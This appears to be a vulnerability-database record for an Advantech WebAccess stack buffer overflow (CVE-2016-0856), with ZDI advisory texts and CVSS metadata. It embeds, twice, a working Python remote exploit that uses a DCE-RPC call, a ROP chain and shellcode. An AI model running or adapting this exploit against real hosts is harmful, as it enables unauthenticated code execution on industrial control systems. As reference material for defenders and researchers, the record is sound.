ID ZDI-16-061 Type zdi Reporter Anonymous Modified 2016-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the implementation of the 0x11178 IOCTL in the BwpAlarm subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
{"enchantments": {"score": {"value": 8.9, "vector": "NONE", "modified": "2016-11-09T00:17:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-0856"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146976"]}, {"type": "zdi", "idList": ["ZDI-16-098", "ZDI-16-075", "ZDI-16-118", "ZDI-16-091", "ZDI-16-087", "ZDI-16-103", "ZDI-16-117", "ZDI-16-056", "ZDI-16-097", "ZDI-16-089"]}, {"type": "exploitdb", "idList": ["EDB-ID:44376"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807033"]}, {"type": "ics", "idList": ["ICSA-16-014-01"]}], "modified": "2016-11-09T00:17:47"}, "vulnersScore": 8.9}, "published": "2016-02-05T00:00:00", "id": "ZDI-16-061", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 2, "history": [{"differentElements": ["modified"], "edition": 1, "lastseen": "2016-09-04T11:33:58", "bulletin": {"published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-061", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "bulletinFamily": "info", "viewCount": 0, "cvelist": ["CVE-2016-0856"], "modified": "2016-09-04T00:00:00", "hash": "19835cf472b8af983c208ea058b432e5d55c45353b56fee8e5a971ff23887108", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x11178 IOCTL in the BwpAlarm subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "type": "zdi", "id": "ZDI-16-061", "lastseen": "2016-09-04T11:33:58", "reporter": "Anonymous", "objectVersion": "1.2", "hashmap": [{"hash": "95e97f794334ec3eda8ab45b6b2755ab", "key": "cvelist"}, {"hash": "ad986f81a9f95e072e489553e6bed821", "key": "modified"}, {"hash": "d03e35db490d2751e1a67e97b99e81e0", "key": "description"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "555141843ad39d45f006ad9e2b6c2923", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "7079c72c21415131774625ba1d64f4b0", "key": "reporter"}, {"hash": "c7eb87bf45c251d612a2584c102f8540", "key": "href"}, {"hash": "e17fb4c1cfc5811dbacd08b53c747b8d", "key": "title"}, {"hash": "93ce860c58bb6b28ee7c5d2624a3e891", "key": "published"}], "title": "Advantech WebAccess webvrpcs Service BwpAlarm.dll sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability"}}], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x11178 IOCTL in the BwpAlarm subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "bulletinFamily": "info", "viewCount": 12, "cvelist": ["CVE-2016-0856"], "modified": "2016-11-09T00:00:00", "hash": "0faefd5b4729fc56d3367a69032d1b259f56e571a3b0f12a44df1d896bb0366d", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01"], "type": "zdi", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-061", "lastseen": "2016-11-09T00:17:47", "reporter": "Anonymous", "objectVersion": "1.2", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "95e97f794334ec3eda8ab45b6b2755ab", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d03e35db490d2751e1a67e97b99e81e0", "key": "description"}, {"hash": "c7eb87bf45c251d612a2584c102f8540", "key": "href"}, {"hash": "f2249e2ed581e22fd91c3d42b700b581", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "93ce860c58bb6b28ee7c5d2624a3e891", "key": "published"}, {"hash": "555141843ad39d45f006ad9e2b6c2923", "key": "references"}, {"hash": "7079c72c21415131774625ba1d64f4b0", "key": "reporter"}, {"hash": "e17fb4c1cfc5811dbacd08b53c747b8d", "key": "title"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}], "title": "Advantech WebAccess webvrpcs Service BwpAlarm.dll sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability"}
{"cve": [{"lastseen": "2019-05-29T18:15:32", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors.", "modified": "2016-12-03T03:18:00", "id": "CVE-2016-0856", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0856", "published": "2016-01-15T03:59:00", "title": "CVE-2016-0856", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-04-03T00:57:06", "bulletinFamily": "exploit", "description": "", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "href": "https://packetstormsecurity.com/files/146976/Advantech-WebAccess-webvrpcs-Buffer-Overflow.html", "id": "PACKETSTORM:146976", "type": "packetstorm", "title": "Advantech WebAccess webvrpcs Buffer Overflow", "sourceData": "`#!/usr/bin/python2.7 \n \n# Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE \n# Date: 03-29-2018 \n# Exploit Author: Chris Lyne (@lynerc) \n# Vendor Homepage: www.advantech.com \n# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe \n# Version: Advantech WebAccess 8.0-2015.08.16 \n# Tested on: Windows Server 2008 R2 Enterprise 64-bit \n# CVE : CVE-2016-0856 \n# See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/ \n \nimport sys, struct \nfrom impacket import uuid \nfrom impacket.dcerpc.v5 import transport \n \ndef call(dce, opcode, stubdata): \ndce.call(opcode, stubdata) \nres = -1 \ntry: \nres = dce.recv() \nexcept Exception, e: \nprint \"Exception encountered...\" + str(e) \nsys.exit(1) \nreturn res \n \nif len(sys.argv) != 2: \nprint \"Provide only host arg\" \nsys.exit(1) \n \nport = 4592 \ninterface = \"5d2b62aa-ee0a-4a95-91ae-b064fdb471fc\" \nversion = \"1.0\" \n \nhost = sys.argv[1] \n \nstring_binding = \"ncacn_ip_tcp:%s\" % host \ntrans = transport.DCERPCTransportFactory(string_binding) \ntrans.set_dport(port) \n \ndce = trans.get_dce_rpc() \ndce.connect() \n \nprint \"Binding...\" \niid = uuid.uuidtup_to_bin((interface, version)) \ndce.bind(iid) \n \nprint \"...1\" \nstubdata = struct.pack(\"<III\", 0x00, 0xc351, 0x04) \ncall(dce, 2, stubdata) \n \nprint \"...2\" \nstubdata = struct.pack(\"<I\", 0x02) \nres = call(dce, 4, stubdata) \nif res == -1: \nprint \"Something went wrong\" \nsys.exit(1) \nres = struct.unpack(\"III\", res) \n \nif (len(res) < 3): \nprint \"Received unexpected length value\" \nsys.exit(1) \n \nprint \"...3\" \n \n# MessageBoxA() Shellcode \n# Credit: https://www.exploit-db.com/exploits/40245/ \nshellcode = (\"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x14\\xad\\x96\\xad\\x8b\\x48\\x10\\x31\\xdb\\x8b\\x59\\x3c\\x01\\xcb\\x8b\\x5b\\x78\\x01\\xcb\\x8b\\x73\\x20\\x01\\xce\\x31\\xd2\\x42\\xad\\x01\\xc8\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\xe2\\x8b\\x73\\x1c\\x01\\xce\\x8b\\x14\\x96\\x01\\xca\\x89\\xd6\\x89\\xcf\\x31\\xdb\\x53\\x68\\x61\\x72\\x79\\x41\\x68\\x4c\\x69\\x62\\x72\\x68\\x4c\\x6f\\x61\\x64\\x54\\x51\\xff\\xd2\\x83\\xc4\\x10\\x31\\xc9\\x68\\x6c\\x6c\\x42\\x42\\x88\\x4c\\x24\\x02\\x68\\x33\\x32\\x2e\\x64\\x68\\x75\\x73\\x65\\x72\\x54\\xff\\xd0\\x83\\xc4\\x0c\\x31\\xc9\\x68\\x6f\\x78\\x41\\x42\\x88\\x4c\\x24\\x03\\x68\\x61\\x67\\x65\\x42\\x68\\x4d\\x65\\x73\\x73\\x54\\x50\\xff\\xd6\\x83\\xc4\\x0c\\x31\\xd2\\x31\\xc9\\x52\\x68\\x73\\x67\\x21\\x21\\x68\\x6c\\x65\\x20\\x6d\\x68\\x53\\x61\\x6d\\x70\\x8d\\x14\\x24\\x51\\x68\\x68\\x65\\x72\\x65\\x68\\x68\\x69\\x20\\x54\\x8d\\x0c\\x24\\x31\\xdb\\x43\\x53\\x52\\x51\\x31\\xdb\\x53\\xff\\xd0\\x31\\xc9\\x68\\x65\\x73\\x73\\x41\\x88\\x4c\\x24\\x03\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x8d\\x0c\\x24\\x51\\x57\\xff\\xd6\\x31\\xc9\\x51\\xff\\xd0\") \n \ndef create_rop_chain(): \nrop_gadgets = [ \n0x0704ac03, # XOR EAX,EAX # RETN ** [BwPAlarm.dll] eax = 0 \n0x0706568c, # XOR EDX,EDX # RETN ** [BwPAlarm.dll] edx = 0 \n \n0x0702455b, # ADD EAX,40 # RETN ** [BwPAlarm.dll] ** eax = 0x40 \n0x0702823d, # PUSH EAX # ADD BYTE PTR DS:[ESI],7 # MOV DWORD PTR DS:[7070768],0 # POP ECX # RETN \n# ecx = 0x40 \n] \nfor i in range(0, 63): \nrop_gadgets.append(0x0702455b) # ADD EAX,40 # RETN ** [BwPAlarm.dll] ** \n# eax = 0x1000 \n \nrop_gadgets += [ \n0x0702143d, # ADD EDX,EAX # ADD AL,0 # AND EAX,0FF # RETN 0x04 ** [BwPAlarm.dll] \n# edx = eax \n# edx = 0x1000 \n \n0x07065b7b, # POP EDI # RETN [BwPAlarm.dll] \n0x41414141, \n0x07059581, # RETN (ROP NOP) [BwPAlarm.dll] \n# edi = RETN \n \n0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll] \n0x0201e104, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] \n0x070630eb, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwPAlarm.dll] \n0x070488f7, # PUSH EAX # MOV EAX,DWORD PTR DS:[EDX*4+7068548] # AND EAX,ESI # POP ESI # POP EBX # RETN \n# esi -> PTR to VirtualAlloc \n0xFFFFFFFF # ebx = -1 \n] \nfor i in range(0, len(shellcode)+1): \nrop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN ** [BwPAlarm.dll] \n# ebx = size of shellcode \n \nrop_gadgets += [ \n0x070441d1, # POP EBP # RETN [BwPAlarm.dll] \n0x0703fe39, # POINTER INC ECX # PUSH ESP # RETN ** [BwPAlarm.dll] ** \n# ebp -> Return to ESP \n \n0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me \n0x90909090, # nop \n# eax = 0x90909090 \n \n0x07010f5c # PUSHAD # RETN [BwPAlarm.dll] \n] \n \nreturn ''.join(struct.pack('<I', _) for _ in rop_gadgets) \n \n# construct buffer \nbuf = \"A\"*379 \nbuf += \"\\x33\\xb7\\x01\\x07\" # 0701b733 RETN \nbuf += create_rop_chain() \nbuf += shellcode \n \n# ioctl 0x278E \nstubdata = struct.pack(\"<IIII\", res[2], 0x278E, len(buf), len(buf)) \n \nfmt = \"<\" + str(len(buf)) + \"s\" \nstubdata += struct.pack(fmt, buf) \n \nprint \"\\nDid it work?\" \ncall(dce, 1, stubdata) \n \ndce.disconnect() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146976/advantechwa-overflow.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:08", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x280B IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-097", "id": "ZDI-16-097", "title": "Advantech WebAccess webvrpcs Service ViewDll.dll TagGroup strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:15", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x523D IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-116", "id": "ZDI-16-116", "title": "Advantech WebAccess datacore Service datacore.exe strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:10", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x1117B IOCTL in the BwpAlarm subsystem. A stack-based buffer overflow vulnerability exists in a call to memcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-075", "id": "ZDI-16-075", "title": "Advantech WebAccess webvrpcs Service BwpAlarm.dll memcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x272F IOCTL in the ViewSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-087", "id": "ZDI-16-087", "title": "Advantech WebAccess webvrpcs Service BwKrlApi.dll strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:15", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x272F IOCTL in the ViewSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-090", "id": "ZDI-16-090", "title": "Advantech WebAccess webvrpcs Service BwKrlApi.dll strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:04", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x791E IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcat using the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-103", "id": "ZDI-16-103", "title": "Advantech WebAccess datacore Service datacore.exe Path strcat Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x5226 IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy with the Username parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-112", "id": "ZDI-16-112", "type": "zdi", "title": "Advantech WebAccess datacore Service datacore.exe Username strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:06", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x523B IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy with the Username parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-117", "id": "ZDI-16-117", "title": "Advantech WebAccess datacore Service datacore.exe Username strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x13C7C IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the TagName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-054", "id": "ZDI-16-054", "title": "Advantech WebAccess webvrpcs Service WaDBS.dll TagName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:58", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the 0x5218 IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy with the Username parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "modified": "2016-11-09T00:00:00", "published": "2016-02-05T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-16-108", "id": "ZDI-16-108", "title": "Advantech WebAccess datacore Service datacore.exe Username strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-05-24T14:11:13", "bulletinFamily": "exploit", "description": "Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow. Remote exploit for Windows platform. Tags: Remote", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "id": "EDB-ID:44376", "href": "https://www.exploit-db.com/exploits/44376/", "type": "exploitdb", "title": "Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow", "sourceData": "#!/usr/bin/python2.7\r\n \r\n# Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE\r\n# Date: 03-29-2018\r\n# Exploit Author: Chris Lyne (@lynerc)\r\n# Vendor Homepage: www.advantech.com\r\n# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe\r\n# Version: Advantech WebAccess 8.0-2015.08.16\r\n# Tested on: Windows Server 2008 R2 Enterprise 64-bit\r\n# CVE : CVE-2016-0856\r\n# See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/\r\n\r\nimport sys, struct\r\nfrom impacket import uuid\r\nfrom impacket.dcerpc.v5 import transport\r\n\r\ndef call(dce, opcode, stubdata):\r\n dce.call(opcode, stubdata)\r\n res = -1\r\n try:\r\n res = dce.recv()\r\n except Exception, e:\r\n print \"Exception encountered...\" + str(e)\r\n sys.exit(1)\r\n return res\r\n\r\nif len(sys.argv) != 2:\r\n print \"Provide only host arg\"\r\n sys.exit(1)\r\n\r\nport = 4592\r\ninterface = \"5d2b62aa-ee0a-4a95-91ae-b064fdb471fc\"\r\nversion = \"1.0\" \r\n\r\nhost = sys.argv[1]\r\n\r\nstring_binding = \"ncacn_ip_tcp:%s\" % host\r\ntrans = transport.DCERPCTransportFactory(string_binding)\r\ntrans.set_dport(port)\r\n\r\ndce = trans.get_dce_rpc()\r\ndce.connect()\r\n\r\nprint \"Binding...\"\r\niid = uuid.uuidtup_to_bin((interface, version))\r\ndce.bind(iid)\r\n\r\nprint \"...1\"\r\nstubdata = struct.pack(\"<III\", 0x00, 0xc351, 0x04)\r\ncall(dce, 2, stubdata)\r\n\r\nprint \"...2\"\r\nstubdata = struct.pack(\"<I\", 0x02)\r\nres = call(dce, 4, stubdata)\r\nif res == -1:\r\n print \"Something went wrong\"\r\n sys.exit(1)\r\nres = struct.unpack(\"III\", res)\r\n\r\nif (len(res) < 3):\r\n print \"Received unexpected length value\"\r\n sys.exit(1)\r\n\r\nprint \"...3\"\r\n\r\n# MessageBoxA() Shellcode\r\n# Credit: https://www.exploit-db.com/exploits/40245/\r\nshellcode = (\"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x14\\xad\\x96\\xad\\x8b\\x48\\x10\\x31\\xdb\\x8b\\x59\\x3c\\x01\\xcb\\x8b\\x5b\\x78\\x01\\xcb\\x8b\\x73\\x20\\x01\\xce\\x31\\xd2\\x42\\xad\\x01\\xc8\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\xe2\\x8b\\x73\\x1c\\x01\\xce\\x8b\\x14\\x96\\x01\\xca\\x89\\xd6\\x89\\xcf\\x31\\xdb\\x53\\x68\\x61\\x72\\x79\\x41\\x68\\x4c\\x69\\x62\\x72\\x68\\x4c\\x6f\\x61\\x64\\x54\\x51\\xff\\xd2\\x83\\xc4\\x10\\x31\\xc9\\x68\\x6c\\x6c\\x42\\x42\\x88\\x4c\\x24\\x02\\x68\\x33\\x32\\x2e\\x64\\x68\\x75\\x73\\x65\\x72\\x54\\xff\\xd0\\x83\\xc4\\x0c\\x31\\xc9\\x68\\x6f\\x78\\x41\\x42\\x88\\x4c\\x24\\x03\\x68\\x61\\x67\\x65\\x42\\x68\\x4d\\x65\\x73\\x73\\x54\\x50\\xff\\xd6\\x83\\xc4\\x0c\\x31\\xd2\\x31\\xc9\\x52\\x68\\x73\\x67\\x21\\x21\\x68\\x6c\\x65\\x20\\x6d\\x68\\x53\\x61\\x6d\\x70\\x8d\\x14\\x24\\x51\\x68\\x68\\x65\\x72\\x65\\x68\\x68\\x69\\x20\\x54\\x8d\\x0c\\x24\\x31\\xdb\\x43\\x53\\x52\\x51\\x31\\xdb\\x53\\xff\\xd0\\x31\\xc9\\x68\\x65\\x73\\x73\\x41\\x88\\x4c\\x24\\x03\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x8d\\x0c\\x24\\x51\\x57\\xff\\xd6\\x31\\xc9\\x51\\xff\\xd0\")\r\n\r\ndef create_rop_chain():\r\n rop_gadgets = [\r\n 0x0704ac03, # XOR EAX,EAX # RETN ** [BwPAlarm.dll] eax = 0\r\n 0x0706568c, # XOR EDX,EDX # RETN ** [BwPAlarm.dll] edx = 0\r\n\r\n 0x0702455b, # ADD EAX,40 # RETN ** [BwPAlarm.dll] ** eax = 0x40\r\n 0x0702823d, # PUSH EAX # ADD BYTE PTR DS:[ESI],7 # MOV DWORD PTR DS:[7070768],0 # POP ECX # RETN\r\n # ecx = 0x40\r\n ]\r\n for i in range(0, 63):\r\n rop_gadgets.append(0x0702455b) # ADD EAX,40 # RETN ** [BwPAlarm.dll] **\r\n # eax = 0x1000\r\n \r\n rop_gadgets += [\r\n 0x0702143d, # ADD EDX,EAX # ADD AL,0 # AND EAX,0FF # RETN 0x04 ** [BwPAlarm.dll]\r\n # edx = eax\r\n # edx = 0x1000\r\n\r\n 0x07065b7b, # POP EDI # RETN [BwPAlarm.dll]\r\n 0x41414141, \r\n 0x07059581, # RETN (ROP NOP) [BwPAlarm.dll]\r\n # edi = RETN\r\n\r\n 0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll]\r\n 0x0201e104, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]\r\n 0x070630eb, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwPAlarm.dll]\r\n 0x070488f7, # PUSH EAX # MOV EAX,DWORD PTR DS:[EDX*4+7068548] # AND EAX,ESI # POP ESI # POP EBX # RETN \r\n # esi -> PTR to VirtualAlloc\r\n 0xFFFFFFFF # ebx = -1\r\n ]\r\n for i in range(0, len(shellcode)+1):\r\n rop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN ** [BwPAlarm.dll]\r\n # ebx = size of shellcode\r\n\r\n rop_gadgets += [\r\n 0x070441d1, # POP EBP # RETN [BwPAlarm.dll]\r\n 0x0703fe39, # POINTER INC ECX # PUSH ESP # RETN ** [BwPAlarm.dll] **\r\n # ebp -> Return to ESP\r\n \r\n 0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me \r\n 0x90909090, # nop\r\n # eax = 0x90909090\r\n\r\n 0x07010f5c # PUSHAD # RETN [BwPAlarm.dll] \r\n ]\r\n\r\n return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n\r\n# construct buffer\r\nbuf = \"A\"*379\r\nbuf += \"\\x33\\xb7\\x01\\x07\" # 0701b733 RETN\r\nbuf += create_rop_chain()\r\nbuf += shellcode\r\n\r\n# ioctl 0x278E\r\nstubdata = struct.pack(\"<IIII\", res[2], 0x278E, len(buf), len(buf))\r\n\r\nfmt = \"<\" + str(len(buf)) + \"s\"\r\nstubdata += struct.pack(fmt, buf)\r\n\r\nprint \"\\nDid it work?\"\r\ncall(dce, 1, stubdata)\r\n\r\ndce.disconnect()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44376/"}], "openvas": [{"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "description": "This host is running Advantech WebAccess\n and is prone to multiple vulnerabilities.", "modified": "2019-04-06T00:00:00", "published": "2016-01-22T00:00:00", "id": "OPENVAS:1361412562310807033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807033", "title": "Advantech WebAccess Multiple Vulnerabilities Jan16", "type": 